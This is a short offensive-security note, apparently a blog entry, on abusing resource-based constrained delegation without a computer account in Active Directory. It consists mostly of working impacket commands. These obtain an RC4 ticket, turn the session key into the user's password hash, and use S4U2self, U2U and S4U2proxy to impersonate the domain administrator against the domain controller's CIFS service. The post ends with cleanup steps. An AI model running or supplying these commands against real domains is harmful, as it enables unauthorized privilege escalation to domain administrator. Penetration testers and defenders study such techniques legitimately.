SPN-less RBCD

05.06.2024 ยท dadevel

Abuse RBCD without a computer account.

Requirements: Configure RBCD from the victim computer to your sacrificial user.

Get a RC4 TGT for your user.

impacket-gettgt -hashes :$(pypykatz crypto nt 'passw0rd') corp.local/jdoe

Extract the session key.

impacket-describeticket ./jdoe.ccache | grep 'Ticket Session Key'

Set the session key as new password.

impacket-smbpasswd -newhashes :$sessionkey corp.local/jdoe:'passw0rd'@dc01.corp.local

Perform black magic to impersonate a privileged account (S4U2self + U2U + S4U2proxy).

export KRB5CCNAME=$PWD/jdoe.ccache
impacket-getst -k -no-pass -u2u -impersonate administrator -spn cifs/dc01.corp.local corp.local/jdoe

Reset the password of the sacrificial user if the password policy permits reuse of old passwords.

impacket-smbpasswd -hashes :$sessionkey -newhashes :$(pypykatz crypto nt 'passw0rd') corp.local/[email protected]

Otherwise force-change the users password as domain admin.

References: